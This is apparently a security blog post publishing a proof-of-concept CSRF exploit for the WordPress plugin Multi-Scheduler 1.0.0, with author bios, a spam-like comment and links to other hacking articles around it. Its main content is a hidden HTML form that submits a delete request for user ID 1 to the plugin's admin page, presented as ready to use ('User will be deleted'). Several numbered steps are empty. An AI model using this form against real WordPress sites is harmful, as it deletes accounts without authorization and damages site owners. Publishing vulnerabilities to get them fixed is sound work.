Sponsored
CVE (POC)

Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)

Vulnerability Details :

The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.

  • Exploit Author: UnD3sc0n0c1d0
  • Vendor Homepage: https://www.bdtask.com/
  • Category: Web Application
  • Version: 1.0.0
  • Download – https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip

Full Proof of Concept (PoC)

Step -1

Step -2

Step -3

Step -4

 <form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">
      <input type="hidden" name="pro&#95;delete&#95;id" value="1" />
      <input type="hidden" name="professional&#95;delete" value="Delete" />
      <input type="submit" value="Submit request" />
    </form>

Step -5

Step -6

BOOM 🙂 !! User will be deleted.

About the Author
Virat Sharma Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored
Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.

View Comments

  • I'm amazed, I must say. Rarely do I come across a blog that's both educative and amusing, and without
    a doubt, you have hit the nail on the head. The issue is something
    which too few people are speaking intelligently about.

    I'm very happy that I found this during my hunt for something regarding this.

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

4 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

9 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

9 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.